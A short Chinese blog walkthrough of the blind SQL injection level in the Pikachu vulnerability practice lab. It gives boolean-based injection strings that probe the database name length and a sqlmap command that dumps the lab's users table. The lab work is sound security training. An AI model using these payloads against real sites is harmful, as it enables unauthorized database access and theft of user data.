欢迎光临散文网 会员登陆 & 注册

Pikachu 漏洞练习平台Sql Injection盲注通关指南pika~pika~

2023-03-14 14:09 作者:Yukito_online  | 我要投稿

一如既往的打开靶场

lili' and length(database())=6#
lili' and length(database())=7#

这样的漏洞利用,有一个很重要的前提条件是必须事先知道其中一个正确能返回结果的name,在实战中靠暴力破解说不定能跑出来,但是在之后的查库名,查表名,查列名,拿数据过程,就需要花费大量时间去猜测,直接上sqlmap吧

sqlmap.py -u "http://pikachu/vul/sqli/sqli_blind_b.php?name=lili&submit=%E6%9F%A5%E8%AF%A2" -D "pikachu" -T "users" -C "username" --dump-all
     

当然,工具是为了方便,而不是为了依赖,万一工具哪天作者挂了或者不更新了,进步的过程必然伴随着痛苦,但坚持坚持下来的人一定很酷。


标签:

Pikachu 漏洞练习平台Sql Injection盲注通关指南pika~pika~的评论 (共 条)

分享到微博请遵守国家法律